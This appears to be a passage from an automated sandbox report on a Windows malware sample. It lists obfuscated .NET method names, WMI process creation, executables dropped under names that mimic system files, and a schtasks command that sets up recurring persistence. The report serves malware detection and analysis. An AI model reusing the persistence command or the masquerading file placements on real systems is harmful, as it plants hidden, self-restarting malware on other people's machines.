            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, E1nwjyy93vvk1gS5KlU.csHigh entropy of concatenated method names: 'rLo0mVGUVf', 'vFP08kAEn6', 'qrHmVBRvQ8dqJj2RSFq', 'FaMqQcR0WJHib7cSiuc', 'dRJH71R1gxloOeJ8w22', 'Ac7lQCRd9pO5A7m9skI', 'JOKI6iRFGnTYhntK5m2', 'VJNm6jRhgqfwx8daUpq', 'u1KpH1RG3uyBFsycKnK', 'vVxY1uR3alTBF04RoCq'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, n6IofTyFkatovAQ0p10.csHigh entropy of concatenated method names: 'plR0zcHytb', 'ODW6gYJTj6', 'zM46eM6FOI', 'JYM6yjWMTd', 'xu660GQfot', 'bC966eoYoe', 'TeZ6EeUVnc', 'Eeq6Axo1k0', 'TOj6itCcZJ', 'uAA6Xl2WFR'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, vlGOIWe20qq3naWWrml.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'or6oXJDEE3sHGrY0fLd', 'hIMeepD5Bgoa6MvoBy1', 'Yyu0syDYHbPxTdQ2LYy', 'uJLIOfD9bKlX05K7BjJ', 'jAk9sEDegRIkoaP3pTv', 'o66ENODpAAQOL7hTxyh'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, hfxAKJilnQlIrFZCr9S.csHigh entropy of concatenated method names: 'aFQOPL1YSR', 't9YOlM11Da', 'A2cOb6wP36', 'dNJOwVnP0H', 'KkBOMpHZth', 'pETO2v9HLK', 'tqrOWN9CW7', 'pfvOhxxGIC', 'dnHOOVHQqF', 'VEgOkx9WMa'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, CZxwPR0CUvkLQCAeI43.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'IW2aRFXmdy', '_168', 'xaAwclh3v3kPSTslbb0', 'KhQLKShBKZRUbMfuvkM', 'pGBlaFhaAx9aLfJLwC7', 'veqlRdhypUS6vQsjNdJ', 'LJq7ZVhc7w7mdlTDKTf'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, qeQQ4Z0asSXygCfgZbr.csHigh entropy of concatenated method names: '_223', 'Q7ZVQN14qKxeo9cTVvH', 'HRxnSJ1QeNBDlQA9AWq', 'YwT0Da1vtQAOLpRKEwW', 'w3Kjw410VLtxs7hEKns', 'C68caS11rn3sWekiwhS', 'LXXOxL1drd1h5QNbgN2', 'TUL1q11FOi8KVtaUBtJ', 'a1xQ4F1hUJl3E8CqAG8', 'MvOcs31GXroqUvyL7KR'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, r57iwA0IsF95Be2IVZP.csHigh entropy of concatenated method names: '_269', '_5E7', 'Dhtag5WyJ8', 'Mz8', 'EVqaArqQGi', 'S64fR3hwO4ituV6fnqw', 'Gw3BJqhtty0usrpZTq7', 'ysStLThIbDN6G2KjieH', 'MDCMm5hXIrUsRsWOnT6', 'YhhIVdh7grYAlnvST3S'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, NljHUhE34rSaZiPpGKc.csHigh entropy of concatenated method names: 'yQhPoC0m4R', 'XfsPDmalQX', 'Q1mZJrEIiRx0RojVeq9', 'QLGs2UEXD6b4Urx4Npa', 'wqFltvE7Kig6LaUV538', 'xiK4KCEUjX2CV6dr0Or', 'h2rkHEEmR7mGaTeFITF', 'tFDJbAEuQmE9jeYaW7j', 'Kr26NHEzuGTHIicwriV', 'aZMbUX5OrMuPVs2IqPS'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, tmbvj106GpcYBVblL44.csHigh entropy of concatenated method names: 'Tnditp3uZD', 'AI0iH6Fkfu', 'qmFinrDQsM', 'RwSippumxU', 'Druif1JX1R', 'yspiV46YmQ', 'Jl02kivcW1dZlVpksfo', 'h3c4BTvaAfNMs0hEFdm', 'lpkloGvyQGVy4wGQ1X3', 'eEyKC7v64lN2L6kUS4n'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, oFQZbIO3CRvUHyfAj5.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'YErZLGdWL', 'Ve7QN82vYgt1rCmslVD', 'QMxjuF203K4yCqFREqX', 'xdaGJE21ZMw4VyTlHCN', 'J5UO0T2d105kan0mCkr', 'tKK2od2FmyfESft7KMi'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, GRJtYFeeyVyCjZaOrIi.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'AhipPvVvKu063F22vUZ', 'vvffvvV0Oj8X2wYmknC', 'l7FO93V17W6yaoPBb0v', 'w15C4YVdvlAjTI9d3lq', 'GyGIysVFdJraVHbjI72', 't6RU7tVhsE8VjR3xAAr'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, SGOPYK0fmWlyYRE1101.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'oy5apjJ5og', 'cfoG60KNrw', 'b3BaTLDxmA', 'Vy8DyEhrAY0CLv5XEU8', 'VtNDo5hRtdyTnVeB89S', 'P4atSdhodyJuNQNX2r7', 'mfWTvvhMNupZDGjCZpA', 'BiqnxkhfHMnvM8kIbLx'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, H2LdDN6DmiUZqwbFELm.csHigh entropy of concatenated method names: 'w8eadssH0j', 'tMuauXdvyY', 'zpEa7ogK6m', 'VJoaLhqC9C', 'TIeaxB381m', 'mbA3yyB8X1aNeImJxeF', 'uAr1hSBEroWxPK4a9Jv', 'PXT8VLBkFsVKsanIjNT', 'BcxbQMBWXWJCmJjnJUu', 'vq7vi6B5iyGh3QIbyil'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, rEmbHIe07RAAnnyy0jl.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'MMEH1RV6nWVOEqBLPS8', 'KnoB6EVi75JXoPxayvS', 'wOYmjiVP61pWT9qJuUF', 'h8SQoCVkjhZw1wtkboi', 'GTMXvVVWcj7qIByLFtJ', 'IWyi4FV8ICsadNPrY6t'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, dYsmNlj8ExMOiVVCQt.csHigh entropy of concatenated method names: 'B6VPp0n0p', 'msWlkknHR', 'wsMbgRAwi', 'b3gwJpmai', 'kMwMoLNY9', 'YkQ2Qgmun', 'OlAWfdaSd', 'jq4am6Hg7HWnQhXR0vr', 'Hn6m2iHDg9QW7RAp2aD', 'CsQoDPHSUtLWy4a0WjY'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, f8GoMo0rGT4SKXTWSh5.csHigh entropy of concatenated method names: 'c4pAbNG5y1gMmODtItm', 'jyY24EGYqU4ZLsVmD8n', 'XjevxvG89amqMYnAhWV', 'rJVPAmGEj3ONdN3TQbe', 'IWF', 'j72', 'RAIG9bt8nK', 'bFUGN4ds6L', 'j4z', 'xXsGFV7R20'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, lX9pDu7M1hj0vYAZJN.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'FnqTfZ2mfvc9qAV5c1d', 'pUqBR32upEAYPQ8Q6Fk', 'gqgC1g2zHWBOG1suqYk', 'maqoxjxOGPD9JdmBZVA', 'ggWcVMxH0Mu9Rx40tAk', 'bV34j1x2gVaRbgRtsKM'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, VTA2dBEwqpx1Im1cZWu.csHigh entropy of concatenated method names: 'M01P5tv2CE', 'sQZPZrhi48', 'LnJP4JwZ8f', 'EN0PtphfEq', 'fw4PHcKQFf', 'lfR80Y5y9uM61GynKRf', 'lOh2wB5BUG1bhQ8JAh4', 'hZiyHW5aQo2XxHOfLyO', 'ze595b5csn1x77oEssd', 'Q5gZ9N56ZZ50essrsms'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, RMQDAIA2iyIGcdEx9Di.csHigh entropy of concatenated method names: 'iGLw3BR0cO', 'A1IwG96o6c', 'v51wRvk3Vr', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'XsCwsFtbOr'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, steC9eeroYoeceZeUVn.csHigh entropy of concatenated method names: 'RJXyYkUU5O', 'QSlVCcZVbPNep3vbSId', 'uIsFUPZN52ROjIvl553', 'tq2EfLZn8Me8eFeuXyk', 'O6duNDZbHnkJLNUgEdf', 'ivN25jZgT2MSFC7dvPe', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, mrXjmJ6FYcUctx50l3k.csHigh entropy of concatenated method names: '_7zt', 'a6laYXAsVB', 'olKaoDbB5C', 'dt1aDxHDW3', 'oXBaQoE4D5', 'OcbajPjOh5', 'D3XavsRH2c', 'Mf8t8qBFm9Eq89eI327', 'NNfNvSBhD1OxuNOedlr', 'lrCR6LB1lNEEpabYoJV'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, PTAlGt69bNQ8InDWwf9.csHigh entropy of concatenated method names: 'sZ1a6EFHYg', 'FsgaE17SdB', 'zimaAoYXmA', 'GEPfCSBfOxtfbuBfbJF', 'b49WbbB4jViseV0Z7KV', 'VTxpGjBoEwIYU8B8UvY', 'UkBL8FBMGstulj6Osby', 'n8Hny7BQo68PSUkP42T', 'E1tEE7BvQWgurIY0VQB', 'RiwWh7B0nshS7T6EAKW'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, QJW2jSyZhvc7pEkiHdp.csHigh entropy of concatenated method names: 'xYSAXTaeha', 'l00A3tOonn', 'KAf5ny4XEO4pcjQgHma', 'r5L02S47HIoU62qYqLT', 'C3SUYD4trscj0afPwvn', 'iwWvpH4IesmUospT3Dk', 'nAqA9uMGpD', 'p1NrD7QODSnHCu8KprX', 'Xa94TYQH6PFlRnOvYP7', 'uHfbcu4ummUP6WlENSR'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, Ky65tBEJqfYe2SD64yu.csHigh entropy of concatenated method names: 'NJUl6U6mhN', 'IwxlEZaijo', 'HiNlAOLLki', 'fLiliseEoG', 'aLQlXCWLD8', 'IFnl3KV4lZ', 'xy5lG1ARtP', 'XumlR5OmZ0', 'pQ1lsZUpFo', 'BxIlajYJVc'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, ySY8PQMLO98W8injIB.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'oaXdLp2lEgc8GaQfrAc', 'BS48u92ZR2GpAHmnqQs', 'ogYVtu2KD1sCqWujZpE', 'rD5kGF2rHTGoCxcQNZT', 'gIV4gi2RvK6q5A2dNfW', 'Hunq922oGkY9D5OAv4L'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, Hnglq4Z4f7vvXRtYro.csHigh entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'px58m7x7pLtr3rVlykO', 'fQwCVZxUMLCIDmOdXvY', 'TNSBuExmt0wlyOHEPwx', 'fJHJvXxuoeBc3ckYehp', 'WgMXI9xz9e35ss74hVr', 'flfjb5nOBkWObSENg7P'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, ulIuwAEcJv1dBQ3nKmW.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, rqnYLEiwDI3fwWnpGb.csHigh entropy of concatenated method names: 'NYLSEwDI3', 'hwKK1FkCWW9On6rRZZ', 'A9hJN6iXpcGxr9d7ZM', 'Sntq9gP6OTEQ15WTWY', 'UU6DkOWWArEeqaI2kk', 'L13yDO8UKft3a7PkDV', 'jgMylIC5R', 'SQJ0m8QLN', 'rFW6s8lLj', 'XAJEFKkF5'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, SFAZZmeBFFtetSdvveD.csHigh entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'znlsQcN9FsH8wC3G4Vy', 'paYFRjNeDaoofc2dDjk', 'rIUW1jNpaW62VDbXGLh', 'a7Oa1QNClQYWmhE2oPf', 'ugRC7XNJNUgbVu4k7gH', 'WpW92xNATxnADMEsgZB'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, aJMlxKAqIi1FWf8OsKw.csHigh entropy of concatenated method names: 'Sm2WjOUGwc', '_1kO', '_9v4', '_294', 'kRmWvQ02WO', 'euj', 'msHWPCxuGH', 'zLjWlQcX2Q', 'o87', 'RcbWbInxjy'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, olvTihy2Cmx8PY3jcud.csHigh entropy of concatenated method names: 'sLH6mqlUtv', 'dX868Dg6Jw', 'dRT6z9AuKH', 'LJaEgBLXLN', 'FMxEeOVqg6', 'wVTEyX7ISm', 'EQKE0uxc5k', 'G30E6EnDda', 'FFsEEFthKY', 'O5HTNBMXD0hjrUbVp6Y'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, TV5TmIe3Hqvt4qv0b7O.csHigh entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'sVBEHwNNMssAf7G8ihH', 'V8wxggNgRMelvFWGwPq', 'hXxIboNDn4iCqLXVLAB', 'ft1Z18NSGp82Sbjy3Ks', 'NDTr8lNlky80QUf7drY', 'qbFS9SNZuYU6ymue1On'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, S2cyv6iRAHria5jC7vE.csHigh entropy of concatenated method names: 'nPxg8dFFgWdhG', 'hZldWKsoVPMDWlyS7yT', 'UpR9nVsMLkKQHSFU6eF', 'tSUSspsfWNY7FVDPK1S', 'Xu3XDys4E8cIYokMlE3', 'H0ESvBsQbROGVx9I42M', 'AaGPkWsrXimIrWWSfkc', 'YMkPdWsRS6ONBS7rosB', 'xSUrQrsvR0tGZZ6u8vW', 'f7efC0s0701TEslsw4o'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, vyYwpEAvogK6mJJohqC.csHigh entropy of concatenated method names: 'IGD', 'CV5', 'v5IbPonVVY', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, h3ttlAE1prhLd1Vi5C0.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'rVUlvCDkhV', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, KcHRCg0Taeo5cK48nmF.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'fwnGRj0KF6', 'OqgaNMbb7N', 'r0oGs9fRya', 'flCam6agKQ', 'anA3pihYvqJOPuypxEf', 'utw43Sh9lWA6YS6AmTJ', 'yrKP6hhETTJb5wTy9ET'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, xAEJmkyuNbNpTsoB8bj.csHigh entropy of concatenated method names: 'OPAEWEJmkN', 'v6F2GpfmtxZHnHiVnI1', 'axeVjlfuTbvAyUcBPKK', 'hirFPLf7cgamKjXvOXD', 'EHAI2jfUGuf2vT2TysE', 'BAi5ZVfz38QkA2yXg4A', 'burOv14O1Hoj0d14t9C', 'apYrQN4Hg64idqdeHQA', 'UJIbab42jDMd4xwgxQw', 'CgKKrI4xR4C2gO1HrZl'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, T6KrWZeYLExIGM2xDjC.csHigh entropy of concatenated method names: 'LWoeWo40ub', 'gs9SNXg4O3DKFeeCgSM', 'Nlrmf0gQEo8MFi96gYK', 'BOK54EgMfHTAUlYgT3r', 'qDZTDAgfxu03NLlg1IP', 'ApDXAmgv3bRnAX0oOCm', 'KrQdyNg0gSTKWxivEpK', 'p6m4UJg13O5j0OBMToW', 'pvoBnFgdEiAUyr9G4Ea', 'f28'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, J4m9cdAyduM4lXJjpGQ.csHigh entropy of concatenated method names: 'pFJbX8oEwD', 'IBrb3WNY84', '_8r1', 'v3abGuI0xn', 'dQpbR9glwO', 'zfYbsby9Ax', 'vWQbaSdrmO', 'caU35PeM65ovfxFe30c', 'MNWwjtefvU7jDhv1BEi', 'WLBgQie4cDBFxLwM7Cd'
            Source: 0.3.5P9EdUgv5r.exe.6bda5a6.0.raw.unpack, zAYVLbewkKbSB8fa4Cv.csHigh entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'Wbqw67guF3x3fUxotCB', 'AI89GGgzVTwjipxZgjR', 'ky6arcDOrDC0lFSnela', 'HXerahDHm6c33U8QWQE', 'si68uLD24TUojkPFEiW', 'quxdvCDxuhKbFoe3THf'

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\serversessionmonitor\blockfont.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Drops executables to the windows directory (C:\Windows) and starts them
            Source: unknownExecutable created and started: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exe
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Program Files (x86)\Windows Portable Devices\winlogon.exeJump to dropped file
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Program Files (x86)\Microsoft OneDrive\LogoImages\qwhJcOiWbbUoQMvwnJNr.exeJump to dropped file
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Program Files (x86)\Windows Mail\qwhJcOiWbbUoQMvwnJNr.exeJump to dropped file
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Program Files (x86)\Windows Media Player\en-US\backgroundTaskHost.exeJump to dropped file
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeJump to dropped file
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\qwhJcOiWbbUoQMvwnJNr.exeJump to dropped file
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Recovery\SearchApp.exeJump to dropped file
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeFile created: C:\serversessionmonitor\blockfont.exeJump to dropped file
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Program Files\Windows Portable Devices\qwhJcOiWbbUoQMvwnJNr.exeJump to dropped file
            Source: C:\serversessionmonitor\blockfont.exeFile created: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\serversessionmonitor\blockfont.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows portable devices\winlogon.exe'" /f
            Source: C:\Users\user\Desktop\5P9EdUgv5r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\serversessionmonitor\blockfont.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\RemotePackages\RemoteApps\qwhJcOiWbbUoQMvwnJNr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
